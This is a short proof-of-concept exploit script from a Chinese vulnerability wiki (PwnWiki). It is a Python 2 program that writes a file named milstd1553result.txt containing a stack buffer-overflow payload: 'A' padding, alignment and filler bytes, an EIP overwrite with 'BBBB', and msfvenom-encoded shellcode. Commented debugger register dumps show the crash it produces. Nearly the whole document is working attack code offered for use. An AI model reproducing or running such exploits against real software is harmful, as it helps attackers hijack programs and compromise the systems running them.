PWNWIK.COM
,
POC
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import struct
import binascii
import os
import sys
#EAX : 00000000
#EBX : 00000000
#ECX : 42424242
#EDX : 77B96330 ntdll.77B96330
#EBP : 000A1328
#ESP : 000A1308
#ESI : 00000000
#EDI : 00000000
#EIP : 42424242
#EFLAGS : 00010246
#LastError : 00000000 (ERROR_SUCCESS)
#LastStatus : C0000034 (STATUS_OBJECT_NAME_NOT_FOUND)
#Last chance expection on 42424242 (C0000005, EXPECTION_ACCESS_VIOLATION)!
file = open("milstd1553result.txt", "w")
junk = "\x41" * 600
align = "\x32" * 4 + "\x31" * 4
prop = "\x43" * 380
imp = "\x62\x7a\x68\x72\x74\x75\x72\x6c\x75\x32"
imp2 = "\x61\x72\x61\x63\x61\x67\x131\x7a"
#EIP Overwrite junk value
overwrite = "\x42" * 4
#Payload size: 29 bytes
#Final size of py file: 160 bytes
#msfvenom -p generic/tight_loop --platform windows_86 -f py -e x86/shikata_ga_nai
buf = b""
buf += b"\xda\xc1\xd9\x74\x24\xf4\x58\xbb\x0b\x7e\x97\x62\x33"
buf += b"\xc9\xb1\x01\x31\x58\x19\x83\xe8\xfc\x03\x58\x15\xe9"
buf += b"\x8b\x7c\x9c"
win32 = junk + align + prop + imp + imp2 + overwrite + buf
print len(win32)
file.write(win32)
file.close()
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
